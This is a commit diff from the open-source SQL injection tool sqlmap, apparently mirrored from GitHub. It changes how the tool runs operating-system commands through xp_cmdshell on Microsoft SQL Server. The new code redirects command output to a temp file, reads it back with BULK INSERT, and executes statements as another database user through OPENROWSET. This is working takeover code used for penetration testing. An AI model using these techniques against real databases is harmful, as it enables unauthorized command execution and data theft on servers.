Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 99c5ea5

Browse files
bdamelebdamele
committed
cleanup for #34 
1 parent d08a54e commit 99c5ea5

3 files changed

Lines changed: 15 additions & 12 deletions

File tree

lib/core/agent.py

Lines changed: 0 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -820,15 +820,6 @@ def replacePayload(self, inpStr, payload):
820820

821821
def runAsDBMSUser(self, query):
822822
if conf.dCred and "Ad Hoc Distributed Queries" not in query:
823-
for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
824-
for sqlStatement in sqlStatements:
825-
if query.lower().startswith(sqlStatement):
826-
sqlType = sqlTitle
827-
break
828-
829-
if sqlType and "SELECT" not in sqlType:
830-
query = "SELECT %d;%s" % (randomInt(), query)
831-
832823
query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
833824

834825
return query

lib/takeover/xp_cmdshell.py

Lines changed: 12 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -148,12 +148,18 @@ def xpCmdshellWriteFile(self, fileContent, tmpPath, randDestFile):
148148
self.xpCmdshellExecCmd(cmd)
149149

150150
def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
151+
if conf.dCred:
152+
self.tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
153+
cmd = "%s > \"%s\"" % (cmd, self.tmpFile)
154+
151155
self.__randStr = randomStr(lowercase=True)
152156
self.__cmd = "0x%s" % hexencode(cmd)
153157
self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr
154158
self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
155-
if insertIntoTable:
159+
160+
if insertIntoTable and not conf.dCred:
156161
self.__forgedCmd += "INSERT INTO %s " % insertIntoTable
162+
157163
self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
158164

159165
return agent.runAsDBMSUser(self.__forgedCmd)
@@ -178,6 +184,11 @@ def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
178184
output = new_output
179185
else:
180186
inject.goStacked(self.xpCmdshellForgeCmd(cmd, self.cmdTblName))
187+
188+
if conf.dCred:
189+
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, self.tmpFile, randomStr(10), randomStr(10)))
190+
self.delRemoteFile(self.tmpFile)
191+
181192
query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)
182193

183194
if conf.direct or any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR)):

procs/mssqlserver/run_statement_as_user.txt

Lines changed: 3 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,2 +1,3 @@
1-
SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%')
2-
# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','%STATEMENT%')
1+
SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','SET FMTONLY OFF %STATEMENT%')
2+
# SELECT * FROM OPENROWSET('SQLNCLI', 'server=(local);trusted_connection=yes','SET FMTONLY OFF SELECT 1;%STATEMENT%')
3+
# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','SET FMTONLY OFF %STATEMENT%')

0 commit comments

Comments
 (0)